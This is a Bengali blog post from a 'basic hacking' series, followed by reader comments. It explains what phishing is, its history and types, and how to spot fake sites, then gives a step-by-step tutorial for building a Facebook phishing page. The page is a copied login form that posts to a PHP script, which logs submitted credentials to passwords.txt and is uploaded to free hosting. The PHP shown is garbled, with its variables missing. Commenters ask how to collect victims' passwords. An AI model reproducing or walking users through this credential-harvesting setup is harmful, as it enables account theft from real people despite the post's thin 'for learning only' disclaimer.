ব্যাসিক হ্যাকিং পর্ব ৫ : ফিশিং এর যাবতীয় খুঁটিনাটি নাড়িনক্ষত্র বিস্তারিত ।

68
3312

আজকের টিউন এর আগে আমি সবাইকে অসংখ্য ধন্যবাদ দিয়ে শুরু করতে চাই আপনাদের সবার প্রচণ্ড সমর্থন আর উৎসাহের জন্য :) আমি জানি খুব ই কম । কিন্তু আপনাদের উৎসাহ আর সমর্থন ই আমাকে বার বার বাধ্য করে আমার স্বল্প জানা কে নিয়ে নতুন নতুন টিউন করার জন্য :) দোয়া করবেন যেন আমি সবসময়ই আপনাদের কে রুচিশীল এবং মার্জিত টিউন উপহার দিতে পারি :)

 

Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

আজকের পর্বে আমরা আলোচনা করব ফিশিং নিয়ে । তো আসুন শুরু করা যাক :D

 

ব্যাসিক হ্যাকিং পর্ব ৫ : ফিশিং এর যাবতীয় খুঁটিনাটি নাড়িনক্ষত্র বিস্তারিত ।

 

প্রথম প্রশ্ন ফিশিং কি ?

ফিশিং শব্দ শুনেন নি অথবা এ সম্পর্কে কিছুই জানেন না এমন মানুষের সংখ্যা বোধহয় টিউনার পেজ এ খুব বেশী একটা নেই ! তারপর ও আসুন দেখি আমি আপনাদের নতুন কি দিতে পারি আজকের টিউন এ :D ইংরেজি এর জাহাজ , ডুব জাহাজ রা হয়ত বলবেন ফিশিং মানে মাছ ধরা :P কিন্তু আসলেই কি তাই ? না ! দুটোর বানানেও বিস্তর ফারাক আর ব্যবহারে তো আকাশ আর পাতাল এর পার্থক্য :P মাছ ধরা ফিশিং এর বানান হচ্ছে  “FISHING” আর আমাদের আলোচ্য ফিশিং এর বানান ” PHISHING” । পুঁথিগত বিদ্যা কি বলে আসুন দেখে নেই :)

উইকিপেডিয়া বলে ,

Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.

অর্থাৎ , একটা বিশ্বাসযোগ্য ইলেক্ট্রনিক যোগাযোগ মিডিয়া এর রূপ ব্যাবহার করে ইউজার নেম , পাসওয়ার্ড , ক্রেডিট কার্ড এর সব তথ্য ইত্যাদি বেআইনি ভাবে হাতিয়ে নেওয়া কে ফিশিং বলে ।

সহজ ভাষায় বলতে গেলে , ধরুন ফেসবুক এর যেকোনো ইউজার এর    ইউজার নেম , পাসওয়ার্ড  ইত্যাদি  হাতিয়ে নেওয়ার জন্য বেআইনি উপায়ে আমি যদি ফেসবুক এর মতই দেখতে একটা লগইন পেজ ব্যবহার করি তখন তাকে ফিশিং বলে :) ফিশিং সাধারণত একটা ইমেইল এর মাধ্যমে ছড়ানো হয়ে থাকে । যেখানে ওই নির্দিষ্ট ইমেইল এ ওই ইউজার কে বলা হয় সংশ্লিষ্ট সাইট এ কোন কারনে লগইন করতে এবং সেখানে লগইন লিঙ্ক ও দেওয়া থাকে । বলাই বাহুল্য এই লিঙ্ক আসল লিঙ্ক না ! এটা আসল টার মত দেখতে একই রকম একটা  লগইন পেজ যেটার সাহায্যে হ্যাকার তার ভিকটিম এর সব তথ্য চুরি করার নিয়তে তৈরি করেছে ।

 

 পরের প্রশ্ন , ফিশিং  এর  ইতিহাস কি ?

এত  আলোচিত একটা  বিষয় কিন্তু ১৯৯৫ সালের আগে এর কোন অস্তিত্ব ই ছিল না ! থাকলেও তা জনসমক্ষে আসে নাই । ১৯৯৫ সালে প্রথম ফিশিং এর অস্তিত্ব ধরা পড়লেও পরবর্তী এক দশক পর্যন্ত এ সম্পর্কে কোন জন সচতনেতা ও তৈরি হয় নি ! ইন্টারনেট এর রেকর্ড ঘাঁটলে জানা যায় , ১৯৯৬ সালের ২ জানুয়ারি প্রথম পৃথিবীর মানুষের সামনে ফিশিং এর মুখোশ উন্মচিত হয় । alt.online-service.america-online নামের একটা ইউজনেট নিউজগ্রুপ প্রথম এর অস্তিত্ব সম্পর্কে জানায় সবাইকে । তাদের তথ্য অনুযায়ী হ্যাকিং এর মত ফিশিং এর ও উৎপত্তি আমেরিকা তে । America Online বা  AOL service  এ প্রথম ফিশিং এর প্রয়োগ হয় ।

এবার আসি এর বিচিত্র বানানের কাছে ! তখনকার সময়ে হ্যাকার দের কে  ইন্টারনেট ও সংবাদমাধ্যম গুলো ফ্রিক (PHREAK) বলে সম্বোধিত করত ! Phreaking  শব্দের আভিধানিক  অর্থ হচ্ছে  টেলিকমিউনিকেশন এর বিভিন্ন দিক নিয়ে গবেষণা , আবিষ্কার  ও পড়াশোনা ! এটা মূলত একটা স্ল্যাং !  ওখান থেকেই হ্যাকার দের কে ফ্রিক নামাঙ্কিত করা হয় , কারন তারা  টেলিকমিউনিকেশন এর বিভিন্ন দিকে ছিলেন ঝানু ওস্তাদ :D কিন্তু সবাই ছিলেন আন্ডারগ্রাউন্ড। তারাই কেউ প্রথম ফিশিং চালু করেন ধারনা করা হয় । এবং যেহেতু ফিশিং পুরো প্রক্রিয়া টাই অনেক টা মাছ ধরার ফাঁদের মত টাই ফ্রিক দের “PH” এবং মাছ ধরার “ISHING”  টাকে একসাথে জোড়া দিয়ে ফিশিং(Phishing) শব্দটার উৎপত্তি হয় :)

ব্যবহার , সময় , কাল ইত্যাদি প্রেক্ষিতে হ্যাকিং এর বিভিন্ন টেকনিক ও ট্রিক কে  হোয়াইট , গ্রে বা ব্ল্যাক হ্যাকিং বলা হয়। কিন্তু শুরু থেকেই ফিশিং কে ব্ল্যাক হ্যাকিং গ্রুপ এ ফেলা হয়েছে ।

 

ফিশিং এর কি কোন ধরণ আছে ? থাকলে তা কি কি ?

জি, ফিশিং এর বিভিন্ন রূপের ধরণ আছে । আসুন দেখে নেই কি কি :

  • Phishing :  সরাসরি ফিশিং করা কেই এই ক্যাটাগরি তে রাখা হয়েছে । এতে কোন নির্দিষ্ট টার্গেট / লক্ষ্য থাকে না । গণহারে ফিশিং করা এই  ক্যাটাগরি এর লক্ষ্য ।
  • Spear Phishing :  একটি নির্দিষ্ট গ্রুপ বা মানুষকে টার্গেট করে ফিশিং করা কে Spear Phishing বলে ।
  • Clone Phishing : এটা হছে , আগেই ইউজার কে ডেলিভারি দেওয়া একটা নির্দিষ্ট ইমেইল এর ক্লোন / দেখতে একই রকম একটা ইমেইল যেখানে সব এ আগের মত থাকে (বিষয়বস্তু , তথ্য ইত্যাদি ) শুধু  এটাচড  লিঙ্ক টা হ্যাকার এর তৈরি করা ফিশিং লিঙ্ক এর সাথে বদলে দেওয়া থাকে ।

 

 

ব্যাসিক হ্যাকিং পর্ব ৫ : ফিশিং এর যাবতীয় খুঁটিনাটি নাড়িনক্ষত্র বিস্তারিত ।

 

 

  • Whaling :  কোন একটা কম্পানি এর মাথা বা কর্তাব্যক্তি কে ইনফেকট করার জন্য পরিচালিত সব হ্যাকিং এই  ক্যাটাগরি এর অন্তর্ভুক্ত ।
  • Link manipulation : যেকোনো অরিজিনাল লিঙ্ক এর মতই দেখতে কিন্তু সামান্য বানানের হেরফের করা লিঙ্ক গুলো ব্যবহার করে ফিশিং করলে তখন টাকে Link manipulation বলে । যেমন : ধরুন www.facebook.com এর Link manipulation হতে পারে www.faceb0Ok.com [ একটা “o”  এর স্থলে একটা “O” (zero) ব্যবহার করা হয়েছে ] !নিচের চিত্র টি দেখুন !

 

 

ব্যাসিক হ্যাকিং পর্ব ৫ : ফিশিং এর যাবতীয় খুঁটিনাটি নাড়িনক্ষত্র বিস্তারিত ।

 

 

  • Filter evasion :  ইমেইল সার্ভিস প্রোভাইডার রা সবসময় ফিশিং  ধরার জন্য সব ইমেইল কে ফিল্টার করে থাকে । এই ফিল্টার কে এড়ানোর জন্য টেক্সট কে এড়িয়ে ছবি ব্যাবহার করে যে ফিশিং করা হয় টাকে Filter evasion বলে ।
  • Pop -up :  ধরুন আপনি একটা সাইট ভিজিট করছেন । এমন সময় হঠাৎ করে যদি একটা পপ আপ এসে আপনাকে বলে লগইন করতে অথবা কোন ধরনের তথ্য শেয়ার করতে তবে নিশ্চিত হয়ে যান এটা Pop-up phishing ।
  • Tabnabbing : এই ধরনের ফিশিং এ যখন আপনি একাধিক ট্যাব ওপেন করবেন তখন নীরবে যেকোনো একটা ট্যাব কে পালটে ইনফেকটেড বা ফিশিং সাইট এ নিয়ে যায় !
  • Evil twins :   এ যাবত কালের সব থেকে ভয়ঙ্কর ফিশিং এটা ! বিভিন্ন পাবলিক প্লেস এ যেখানে ওয়াইফাই থাকে , হ্যাকার রা নিজের একটা ওয়াইফাই জোন তৈরি করে । যখন ই কেউ ওই ওয়াইফাই জোন ব্যবহার করে এর সাথে সংযুক্ত হবে তখন থেকেই হ্যাকার সব ধরনের তথ্য চুরি করা শুরু করে ।
  • Phone Phishing  :  এটাও  অনেক চমকপ্রদ একটা ফিশিং পন্থা । হ্যাকার  ইমেইল এর বদলে  একটা নির্দিষ্ট  কম্পানির কাস্টমার কেয়ার ম্যানেজার অথবা অপারেটর হিসেবে ভিকটিম কে কল করে এবং তার থেকে অত্যন্ত চাতুর্যের সাথে তার সব ব্যক্তিগত তথ্য হাতিয়ে নেয়  ।

পরবর্তী প্রশ্ন কিভাবে বুঝব যে আমি যেই সাইট টি ভিজিট করছি তা আসল নাকি একটা ফিশিং সাইট ?

খুব চমৎকার এবং সবথেকে গুরুত্বপূর্ণ প্রশ্ন :)  উত্তর হচ্ছে , ফিশিং এর জন্য যেসব সাইট কে টার্গেট করা হয় তার বেশিরভাগ সার্ভার আথেনটিকেশন বা পরিচিতি নিশ্চিতকরণ এর জন্য Transport Layer Security (TLS) , Secure Sockets Layer (SSL) এবং খুব ই শক্তিশালী ক্রিপটোগ্রাফী ব্যবহার করে থাকে । সবকিছুর প্রয়োগের উপর নির্ভর করে একটা সাইট কে সার্টিফিকেট দেওয়া হয় । আপডেট করা এবং সর্বাধুনিক সব ব্রাউজার এ যেকোনো ধরনের ফিশিং সাইট কে সনাক্ত করতে পারে এবং টা স্বয়ংক্রিয় ভাবে ব্লক ও করে দেয় । কিন্ত তারপর ও আপনি নিজেও কিছু সতর্কতা অবলম্বন করতে  পারেন । তার জন্য নিচের চিত্র দুটো লক্ষ্য করুন :)

ব্যাসিক হ্যাকিং পর্ব ৫ : ফিশিং এর যাবতীয় খুঁটিনাটি নাড়িনক্ষত্র বিস্তারিত ।

ব্যাসিক হ্যাকিং পর্ব ৫ : ফিশিং এর যাবতীয় খুঁটিনাটি নাড়িনক্ষত্র বিস্তারিত ।

 

উপরের ছবি দুটোতে দেখানো লক্ষণগুলি খেয়াল করুন আপনার ব্রাউজার এর অ্যাড্রেস বারে । এবং সবসময় এর জন্য লিঙ্ক টা খেয়াল করুন । লক্ষ্য করুন সবসময় এর মত লিঙ্ক টা কি আসল লিঙ্ক নাকি দেখতে একটু ভিন্ন কোন লিঙ্ক । ভিন্ন লিঙ্ক হলেই সাবধান :) এছাড়া আমি বলব ভালমানের আপডেটেড ইন্টারনেট সিক্যুরিটি ব্যবহার করতে ।

 

 মিলিয়ন ডলার প্রশ্ন :P কিভাবে বানাব একটা ফিশিং সাইট ?

আমি শুরুতেই বলে নেই এটা শুধুমাত্র শেখার জন্য বর্ণনা করা হছে । কেউ এটার কোনরূপ ধ্বংসাত্মক বা ক্ষতিসাধন উদ্দেশে ব্যবহার করলে তার জন্য টিউনার পেজ বা আমি কোনভাবেই দায়ী থাকব না :) ধন্যবাদ ।

 

এবার আমি ধাপে ধাপে বর্ণনা করব কিভাবে আপনি একটা ফিশিং সাইট বানাবেন । উদাহরণের জন্য আমরা ফেসবুক এর একটা ফিশিং সাইট বানাব :)

১ম ধাপ :  প্রথমেই আপনার দরকার একটা  হোস্টিং  ও একটা ডোমেইন । এর জন্য আমরা ফ্রি  হোস্টিং  এ রেজিস্ট্রেশান করব । আমি এ ক্ষেত্রে  000webhost  ব্যবহার করব ফ্রি    হোস্টিং  এর জন্য ।  000webhost  এ রেজিস্ট্রেশান করতে ক্লিক করুন  এই লিঙ্কে ।  নিচের চিত্রের মত রেজিস্ট্রেশান পেজ আসলে সব ডাটা দিয়ে রেজিস্ট্রেশান করুন । এবং ইমেইল ভেরিফিকেশন করুন ।

ব্যাসিক হ্যাকিং পর্ব ৫ : ফিশিং এর যাবতীয় খুঁটিনাটি নাড়িনক্ষত্র বিস্তারিত ।

 

২য় ধাপ : এবার www.facebook.com এ যান এবং লগইন পেজ এ আসুন । এটা নিশ্চিত করুন যে আপনি লগ আউট করা এবং এটা ফেসবুক এর লগইন পেজ ।  এবার এই পেজ এর যেকোনো জায়গায় রাইট ক্লিক করে View page source  এ ক্লিক করুন ।

ব্যাসিক হ্যাকিং পর্ব ৫ : ফিশিং এর যাবতীয় খুঁটিনাটি নাড়িনক্ষত্র বিস্তারিত ।

৩য় ধাপ :   View page source এ ক্লিক করলে নিচের চিত্রের মত একটা ট্যাব ওপেন হবে । এবার এই ট্যাব এর সব কিছু কে Ctrl + A চেপে সিলেক্ট করুন এবং একটা নোট প্যাড এ পেস্ট করুন । এবার এটাকে সেভ করুন Login.htm নামে ।

ব্যাসিক হ্যাকিং পর্ব ৫ : ফিশিং এর যাবতীয় খুঁটিনাটি নাড়িনক্ষত্র বিস্তারিত ।

৪র্থ ধাপ : এবার নিচের দেওয়া  কোড টি আরেকটি নতুন নোটপ্যাড ওপেন করে কপি পেস্ট করুন এবং এটাকে  phish.php নামে সেভ করুন ।

<?php
header ('Location: http://facebook.com ');
 = fopen("passwords.txt", "a");
foreach(Array as => ) {
fwrite(, );
fwrite(, "=");
fwrite(, );
fwrite(, "rn");
}
fwrite(, "rn");
fclose();
exit;
?> 

৫ম ধাপ : এবার login.htm কে ওপেন করুন নোটপ্যাড দিয়ে অথবা রাইট ক্লিক করে এডিট এ ক্লিক করে । এবার Ctrl + F  চেপে বক্সে  action=”https://www.facebook.com/login.php লিখুন । এবার এই  লাইন টা তে  login.php এর জায়গায়  phish.php লিখুন এবং সেভ করুন । 

৬ষ্ঠ ধাপ : এবার  http://members.000webhost.com/ এই লিঙ্কে যান এবং একটু আগে বানানো আপনার ফ্রী   হোস্টিং অ্যাকাউন্ট এ লগ ইন করুন 

ব্যাসিক হ্যাকিং পর্ব ৫ : ফিশিং এর যাবতীয় খুঁটিনাটি নাড়িনক্ষত্র বিস্তারিত ।

৭ম ধাপ : লগইন হয়ে গেলে Cpanel এ যান , ওখানে File manager  এ যান 

ব্যাসিক হ্যাকিং পর্ব ৫ : ফিশিং এর যাবতীয় খুঁটিনাটি নাড়িনক্ষত্র বিস্তারিত ।

৮ম ধাপ : এবার Public_html এ ক্লিক করুন এর পর  আপ লোড এ ক্লিক করুন এবং  phish.php ও  Login.htm ফাইল দুটো আপলোড করুন । ব্যাস কাজ শেষ । এখন যে কেউ আপনার ওয়েবসাইট ভিসিত করলে সে স্বয়ংক্রিয় ভাবে আপনার তৈরি করা ফিশিং পেজ এ চলে যাবে :P

ব্যাসিক হ্যাকিং পর্ব ৫ : ফিশিং এর যাবতীয় খুঁটিনাটি নাড়িনক্ষত্র বিস্তারিত ।

পরবর্তী  প্রশ্ন , ফিশিং সাইট তো তৈরি করলাম কিন্তু ইউজারনেম ও পাসওয়ার্ড পাব কিভাবে ? :P 

 

http://www.yoursitesadress.p4o.net/lol.html [ লক্ষ্য রাখুন এখানে অবশ্যই   yoursitesadress  এর জায়গা তে আপনার তৈরি ডোমেইন এর লিঙ্ক লিখুন ] এইলিঙ্ক এ যান এবং  লগইন করলেই দেখতে পারবেন নিচের চিত্রের মত দৃশ্য :P

ব্যাসিক হ্যাকিং পর্ব ৫ : ফিশিং এর যাবতীয় খুঁটিনাটি নাড়িনক্ষত্র বিস্তারিত ।

 

 

 

আজকের মত এই ছিল ফিশিং বিষয়ে বিস্তারিত আলোচনা । ভালো খারাপ যাই লাগুক আপনার মতামত জানাবেন দয়াকরে । তাহলে নিজের ভুল গুলো সুধ্রাতে পারব :) ভবিষ্যতের আরও টিউন এর জন্য সাথেই থাকুন :) ধন্যবাদ ।

টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

68 মন্তব্য

  1. একটা জিনিস বুঝতে পারছি না। ডোমেইন পাব কিভাবে? ভাই প্লিজ, একটু হেল্পান…।। :-(

  2. ভাইয়া আপনার পোস্ট টা অনেক ভাল হইছে কিন্তু আমি কিছু জিনিস বুজতে পারতেছি না। ৫ম ধাপের টা করছি কিন্ত cannot find বলতেছে। আর আমি যার পাসওয়ার্ড চাচ্ছি টার কাছে পাথাভ কিভাবে।। সেটা যদি একটু বলে দিতেন তাহলে আরও অনেক ভাল লাগত। আর আমি অনেক দুঃখিত কারন আপনাকে বিরক্ত করতেছি বলি। আমি একটু কম বুজি তাই। ধন্যবাদ

  3. ভাইজান আমি আপনার টিউন পড়ি । আমি সব ঠিক ঠাক মত করেছি । আমার ওয়াপ সাইট http://facebookforhack.wapsite.me এটা কিন্তু লগইন করলে এরোর দেখাচ্ছে । এবং পাসওয়াড পাব কোথায় ।

  4. passward kivabe pabo ta clear kore dile upokrito hoi….
    &
    victim k ki send korbo tao bujchi na .!

    likha ache….
    http://www.yoursitesadress.p4o.net/lol.html [ লক্ষ্য রাখুন এখানে অবশ্যই yoursitesadress এর জায়গা তে আপনার তৈরি ডোমেইন এর লিঙ্ক লিখুন ] এইলিঙ্ক এ যান এবং লগইন করলেই দেখতে পারবেন নিচের চিত্রের মত দৃশ্য …….?
    now login k korbe & login korle ami kivabe pass pabo ?
    kothay pabo ?

    kindly jodi bolen ….

    • ওদের হেল্প সেকশন এ একটা পোস্ট দিলেই ঠিক করে দিবে ১ ঘণ্টার ভেতর :) চেষ্টা করে দেখুন । এটা ছাড়া অন্য যেকোনো ডোমেইন ই ব্যবহার করতে পারবেন কোন সমস্যা নেই :)

  5. সোজা প্রিয়তে……… :D
    আপনাকে অনেক অনেক ধন্যবাদ, কিং (পাইরেট :P ) ভাই…………

  6. সুপার দুপর বাম্পার পোস্ট ভাই :D
    ধন্যবাদ আপনাকে :)

একটি উত্তর ত্যাগ

Please enter your comment!
Please enter your name here

ten − nine =